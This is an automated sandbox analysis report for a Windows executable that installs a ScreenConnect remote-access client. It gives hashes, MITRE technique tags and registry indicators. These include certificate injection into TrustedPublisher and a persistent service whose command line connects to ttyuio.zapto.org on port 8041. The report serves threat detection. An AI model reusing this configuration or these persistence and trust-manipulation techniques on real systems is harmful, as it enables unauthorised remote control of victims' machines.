71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec

Analysis

max time kernel
120s
max time network
135s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
02-10-2024 01:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe
Size

81KB
MD5

53894841704bf6fb1a4b014fb29eb18e
SHA1

e87499ce616479d9b55e32d77aab82c5abc00699
SHA256

71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec
SHA512

124bbd76945f22428a948f870157e8b3ae957246ebea3556ed1ac38ea0b88e099595ac4bd7869bf653d17eece27fc0950a134448cc30b2cc5384f30be5ab5623
SSDEEP

1536:xoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD7UxD2s:renkyfPAwiMq0RqRfbaxZJYYD7s

Score

8^/10

discovery persistence

Malware Config

Signatures

Manipulates Digital Signatures 1 TTPs 2 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (1371300d-cd4e-47d6-9d72-a291dd986401)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\J6MP7XAC.K8J\\N7XBK665.6WZ\\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=1371300d-cd4e-47d6-9d72-a291dd986401&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAZK1q2mjCJ06dnjGpb4t%2bQAAAAAACAAAAAAAQZgAAAAEAACAAAAAOmTGLOxL4GKpp6T%2bIyDQYKhrn3i4Mm197fFd2Gx8K5AAAAAAOgAAAAAIAACAAAAAbR0mAmPIqX0j0yFArwqYKS%2b6pruwzauNWx8pHlzVGRqAEAADwW614RHMtNVpxP4PQHa4mylaGqwK61fJQhBPKlC5Kx%2fVCeOKRHGJ77KRm30%2feJ6MQRtk3omFksXcQKGVt8DRdwmhseYAUktxhrjQ%2fNPqyxC8oTx282YOzhhLyxG9xbTriBUlxm0VsSWIjid5zJLDNta804pXq4616fcyiyGRFIcBtJ1O%2fAAuZm2tlYRWSSgnCSycs7aBKtpK9lgHtkipb6Iaak3BNvyzRdDjXHscDmjtDqXWphJfka9MCjGD7ug%2fsYGICLPoQBnDhlYL2qygeScR5LglWX9gn3I%2fxpDw17MgwZCNr0BKd0AybZHwTWxwbG2clplf1FdLEtEhOqMVQjzIQucD5EpSiX0fiQUObXbxE2pXXgyTCPKQU6HeUMZEbF%2f4Hj%2fMVtiR%2bZSLIevFFXQt7wqpTMul6A7twDJ8nYpSnmQNcltaP%2fgne8zIAJcCymOtruNzsw4pF0yQdLNh7%2fmIzJNJ1VEv5yrpdudV5NXkfaJ%2bd61ty89ipvgxJZNrkEke%2fo20U4AEpTzOJR5PiaPcOScXgTV%2bMw1m1BgOeLo9CeIll%2fQuG3fimhHdGY4vliiLQlr3yHEGwMw3LX6d2y9TY8dfc3NkRxg3lZDFVDeNzGQMV1NpOD8buUJVnNTdfhFr%2bGZ%2f%2bEWHy5uCPldKHWRbCepgMXC%2bM9IJj4tpgYY2HGLozQdxyM9JReGA4Kf16sHm9XlruEgKBzUHxuc1aSeXrkJzhdrl6qVJJctJafruw4z0NaCJJPwuNZcvDUUo3gXDCq4PxNJU2gF3D20CNEgc%2bcfHrT4a7945ccUlyz6B40TYhT50Hg8vJEiddefgaMMmZVHXqhqX7lIUE6IlY0XKVr4otEXf0xMDSfRJrDjHdOHvcgL47Oys0Fs3PNG7XDVgfXi7FcSzammGs8jmzUSNX5TlRZGdRPgdgKHydhbwUJbGHwK%2fcyhIlg2Uya5Fs6GnyrzOf58R3aEORNHjTFHLkmNBYRyQgvFCnRXhGotqk6zlpB7JyQ9hEeDW%2bGtZtHq0HtrmhWawbTZ%2fUESN37aBG7%2b5QSFBGlx5NHyEnjUjoO29%2fPjdp4sfVt%2bN27dSVyEHKUHtT9UKhgQxEEBY9HjATI%2bxrF9IDUEYqgDXsKsUYiiNbEUjZIc2P%2b5ay6eMgRTbngTQEv%2fJyKzm1hFM5Oe7nNII2j4iYhCHvvf1xJuwnZlTqAam5ywDiLMYN%2f%2fxJTdW3%2fGI4ZpLNSpyjVAo9dcd%2fASzqcjxFc1ifMFXw1gdZdS87c2eWuRJeS3ehwZK4tvtaiJmJg7DmV3TaGWsuWF0mTfVLeQmtyocGNGu%2fhGolfAm48GbGKYOB3FhCbHgvHGTtvbYT7CxaR36UhqO2EmqDwWGOHzQSUfG4HNQrA1Ii0LTdDRkN0iGe76Va59VRrrsJjx2y7b%2b%2bIJcmrMxpJoguwM%2bQvK0S9xpuLqrV7BWhvAt1hqbry8GSQ0YiH0TJ1EEOq0N9MbDL2%2f1U%2bNp8DSLRs9KFZH0fSzx%2bZ9zD6iyMgavX5H%2fXnPZ%2fNrDm57v2ZgbbWXadi6W8kVXjV7D03qb443ACCgC8vEBG82cD5EAAAAC2jOgTZ70GyionmRAkybjEVJ1a8sAzLbepVEz6OlHHrQNJEcpFFfznc2xvt7lZgUO36XEcWcEuz8AEeMb72%2fIV&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Downloads MZ/PE file

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe

Executes dropped EXE 4 IoCs

pid	Process
264	ScreenConnect.WindowsClient.exe
2364	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
1472	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
2364	ScreenConnect.ClientService.exe
2364	ScreenConnect.ClientService.exe
2364	ScreenConnect.ClientService.exe
2364	ScreenConnect.ClientService.exe
2364	ScreenConnect.ClientService.exe
2364	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe
3040	ScreenConnect.ClientService.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	71bf7bfb64b74f352afaf5f804bc4861e550b7b2d8d9447caf314d47ed1bfdec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files\ScreenConnect.Client.dll_fc1d7bd48553fcab = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a1 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_d0aeae01f8c2b957	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\identity = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\lock!02000000cfd6760f0801000000070000000000000000000 = 30303030303130382c30316462313436393635653963623830	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Categories	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\lock!0e00000043d6760f10070000f8070000000000000000000 = 30303030303731302c30316462313436393565653233633030	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsBackstageShell.exe.c = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\SizeOfStronglyNamedComponent = b021010000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e5 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\DigestValue = da733f482825ec2d91f9f1186a3f934a2ea21fa1	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\lock!16000000cfd6760f0801000000070000000000000000000 = 30303030303130382c30316462313436393635653963623830	ScreenConnect.WindowsClient.exe
